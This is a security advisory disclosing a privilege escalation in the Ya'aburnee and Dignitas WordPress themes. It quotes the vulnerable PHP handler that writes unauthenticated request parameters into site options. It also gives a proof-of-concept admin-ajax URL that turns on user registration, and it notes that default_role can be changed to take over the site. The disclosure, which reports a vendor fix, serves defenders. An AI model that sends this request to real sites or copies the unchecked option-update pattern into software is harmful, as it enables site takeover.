WordPress Ya'aburnee theme version 1.0.7 and Dignitas theme 1.1.9 suffer from a privilege escalation vulnerability.
37ce88880aa5688e3b5d1d56ea6f15647fe379e279c550ce24f8011e752eea85
------------------------------------------------------------------------------
WordPress Different-Themes Previlage Escalation
------------------------------------------------------------------------------
[-] Vulnerability Author:
@Evex_1337
[-] Themes Affected:
Ya'aburnee
Dignitas
[-] Themes Link:
http://themeforest.net/item/yaaburnee-magazine-ecommerce-theme/6662982http://themeforest.net/item/dignitas-hotel-apartment-responsive-theme/5073713
[-] Affected Version:
Version: 1.1.9 (Dignitas)
Version: 1.0.7 (Ya'aburnee)
[-] Vulnerability Description:
This vulnerability allows an attacker to escalate previleges on the
site and have an admin account which may lead to a full site takeover
the vulnerability is in function "df_save_options":
function df_save_options() {
$fields = $_REQUEST;
foreach($fields as $key => $field) {
if($key!="action") {
echo $key."-".$field;
update_option($key,$field);
}
}
die();
}
passing user input into the update_option function allows an attacker
to update options like users_can_register,default_role.... etc
this can be accessed via ajax by users and non-users:
add_action('wp_ajax_nopriv_df_save_options', 'df_save_options');
add_action('wp_ajax_df_save_options', 'df_save_options');
[-] Proof of Concept:
this will enable user
registrationhttp://localhost/x/wordpress/wp-admin/admin-ajax.php?action=df_save_options&users_can_register=1
[-] Timeline:
03 March - Vendor Notified
04 March - Fix Released
04 March - Public Disclosure